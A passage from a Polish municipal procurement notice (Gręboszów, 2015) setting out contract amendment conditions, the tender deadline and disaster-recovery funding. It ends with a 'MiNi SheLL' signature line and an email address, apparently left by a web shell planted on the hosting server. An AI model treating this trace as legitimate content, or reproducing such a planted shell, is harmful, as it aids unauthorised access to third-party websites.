   4)   Zmiany osobowe;
a)   Zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy, na inne legitymujące się co najmniej 
      równoważnymi uprawnieniami i kwalifikacjami, o których mowa  w ustawie Prawo budowlane lub innych 
      ustawach, 
b)  Zmiana podwykonawców, pod warunkiem wyrażenia zgody Zamawiającego na taką zmianę oraz  spełnienie  przez 
      nowego Podwykonawcę takich samych warunków jak Podwykonawca pierwotny.
 c)  Zmiana inspektora nadzoru lub przedstawicieli ze strony Zamawiającego do realizacji umowy.
5)   Pozostałe zmiany;
 a) Zmiana stawki podatku od towarów i usług VAT związana  ze zmianą obowiązujących przepisów  prawa.
      W takim przypadku Zamawiający dopuszcza  możliwość odpowiednio zwiększenia lub zmniejszenia wynagrodzenia 
      o kwotę równą różnicy w kwocie podatku VAT płaconego przez wykonawcę. 
  b) rezygnacja przez zamawiającego z realizacji części przedmiotu umowy - w takim przypadku wynagrodzenie       
      przysługujące wykonawcy zostanie odpowiednio pomniejszone. W takim przypadku Zamawiający zastrzega  sobie 
      prawo zmiany umowy poprzez sprecyzowanie rzeczywistego końcowego wynagrodzenia.
  c) zmiana umożliwiająca usunięcie rozbieżności  lub niejasności w rozumieniu pojęć użytych  w umowie w celu jej 
      doprecyzowania i   jednoznacznej interpretacji  jej zapisów przez strony,    
  d) zaistnienia innych niemożliwych do przewidzenia w momencie zawarcia umowy okoliczności prawnej, ekonomicznej 
      lub technicznej,   za którą żadna ze Stron nie ponosi odpowiedzialności, skutkująca brakiem  możliwości należytego 
      wykonania umowy, zgodnie ze SIWZ - Zamawiający  dopuszcza możliwość zmiany  umowy, w szczególności 
      terminu realizacji zamówienia umowy. 
3.  W razie wątpliwości, przyjmuje się, że nie wymagają zmiany Umowy następujące zmiany:
     1) danych związanych obsługą administracyjno - organizacyjną Umowy,
     2) danych adresowych,
     3) danych rejestrowych,     
     4) harmonogramu rzeczowo - finansowego realizacji Umowy. 
4.   Warunkiem wprowadzenia zmian do niniejszej umowy jest potwierdzenie powstania okoliczności w formie opisowej
      i właściwie zaakceptowanej przez obie strony umowy oraz sporządzenie pisemnego aneksu podpisanego przez strony 
      umowy pod rygorem nieważności.   
5.  Prawa i obowiązki wynikające z niniejszej umowy nie mogą być przeniesione na rzecz osób trzecich.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.malopolska.pl/uggreboszow/Article/id,277574.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gręboszów, pokój nr 2 lub za zaliczeniem pocztowym, po uprzednim złożeniu wniosku, nie później niż 6 dni przed terminem składania ofert. Cena 200 zł + VAT 23 %.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.04.2015 godzina 10:00, miejsce: 02.04.2015 godzina 10:00, miejsce: Urząd Gminy Gręboszów, Gręboszów 144, 33-260 Gręboszów, pokój nr 11 (piętro) w sekretariacie Urzędu.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie to jest współfinansowane  ze środków z rezerwy celowej budżetu Państwa na usuwanie skutków klęsk żywiołowych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com